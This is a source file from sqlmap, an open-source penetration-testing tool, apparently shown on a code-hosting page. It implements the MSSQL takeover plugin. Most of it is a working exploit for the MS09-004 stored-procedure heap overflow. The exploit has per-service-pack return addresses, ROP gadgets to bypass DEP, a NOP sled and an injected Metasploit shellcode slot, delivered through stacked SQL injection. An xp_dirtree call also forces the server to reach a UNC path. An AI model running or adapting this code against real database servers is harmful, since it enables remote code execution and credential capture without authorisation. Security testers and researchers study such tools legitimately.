Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
 Path: blob/master/plugins/dbms/mssqlserver/takeover.py
2992 views
1
#!/usr/bin/env python

2


3
"""

4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)

5
See the file 'LICENSE' for copying permission

6
"""

7


8
import binascii

9


10
from lib.core.common import Backend

11
from lib.core.compat import xrange

12
from lib.core.convert import getBytes

13
from lib.core.data import logger

14
from lib.core.exception import SqlmapUnsupportedFeatureException

15
from lib.request import inject

16
from plugins.generic.takeover import Takeover as GenericTakeover

17


18
class Takeover(GenericTakeover):

19
    def __init__(self):

20
        self.spExploit = ""

21


22
        GenericTakeover.__init__(self)

23


24
    def uncPathRequest(self):

25
        # inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)

26
        inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath)

27


28
    def spHeapOverflow(self):

29
        """

30
        References:

31
        * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004

32
        * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co

33
        """

34


35
        returns = {

36
            # 2003 Service Pack 0

37
            "2003-0": (""),

38


39
            # 2003 Service Pack 1

40
            "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"),

41


42
            # 2003 Service Pack 2 updated at 12/2008

43
            # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"),

44


45
            # 2003 Service Pack 2 updated at 05/2009

46
            "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"),

47


48
            # 2003 Service Pack 2 updated at 09/2009

49
            # "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),

50
        }

51


52
        addrs = None

53


54
        for versionSp, data in returns.items():

55
            version, sp = versionSp.split("-")

56
            sp = int(sp)

57


58
            if Backend.getOsVersion() == version and Backend.getOsServicePack() == sp:

59
                addrs = data

60


61
                break

62


63
        if not addrs:

64
            errMsg = "sqlmap can not exploit the stored procedure buffer "

65
            errMsg += "overflow because it does not have a valid return "

66
            errMsg += "code for the underlying operating system (Windows "

67
            errMsg += "%s Service Pack %d)" % (Backend.getOsVersion(), Backend.getOsServicePack())

68
            raise SqlmapUnsupportedFeatureException(errMsg)

69


70
        shellcodeChar = ""

71
        hexStr = binascii.hexlify(getBytes(self.shellcodeString[:-1]))

72


73
        for hexPair in xrange(0, len(hexStr), 2):

74
            shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair + 2]

75


76
        shellcodeChar = shellcodeChar[:-1]

77


78
        self.spExploit = """DECLARE @buf NVARCHAR(4000),

79
        @val NVARCHAR(4),

80
        @counter INT

81
        SET @buf = '

82
        DECLARE @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int

83
        EXEC master.dbo.sp_replwritetovarbin 347, @end_offset output, @vb_buffer output, @vb_bufferlen output,'''

84
        SET @val = CHAR(0x41)

85
        SET @counter = 0

86
        WHILE @counter < 3320

87
        BEGIN

88
          SET @counter = @counter + 1

89
          IF @counter = 411

90
          BEGIN

91
            /* pointer to call [ecx+8] */

92
            SET @buf = @buf + %s

93


94
            /* push ebp, pop esp, ret 4 */

95
            SET @buf = @buf + %s

96


97
            /* push ecx, pop esp, pop ebp, retn 8 */

98
            SET @buf = @buf + %s

99


100
            /* Garbage */

101
            SET @buf = @buf + CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)

102


103
            /* retn 1c */

104
            SET @buf = @buf + %s

105


106
            /* retn 1c */

107
            SET @buf = @buf + %s

108


109
            /* anti DEP */

110
            SET @buf = @buf + %s

111


112
            /* jmp esp */

113
            SET @buf = @buf + %s

114


115
            /* jmp esp */

116
            SET @buf = @buf + %s

117


118
            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)

119
            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)

120
            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)

121
            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)

122
            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)

123
            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)

124


125
            set @buf = @buf + CHAR(0x64)+CHAR(0x8B)+CHAR(0x25)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00)

126
            set @buf = @buf + CHAR(0x8B)+CHAR(0xEC)

127
            set @buf = @buf + CHAR(0x83)+CHAR(0xEC)+CHAR(0x20)

128


129
            /* Metasploit shellcode */

130
            SET @buf = @buf + %s

131


132
            SET @buf = @buf + CHAR(0x6a)+CHAR(0x00)+char(0xc3)

133
            SET @counter = @counter + 302

134
            SET @val =  CHAR(0x43)

135
            CONTINUE

136
          END

137
          SET @buf = @buf + @val

138
        END

139
        SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''

140
        EXEC master..sp_executesql @buf

141
        """ % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], addrs[6], addrs[7], shellcodeChar)

142


143
        self.spExploit = self.spExploit.replace("    ", "").replace("\n", " ")

144


145
        logger.info("triggering the buffer overflow vulnerability, please wait..")

146
        inject.goStacked(self.spExploit, silent=True)

147


148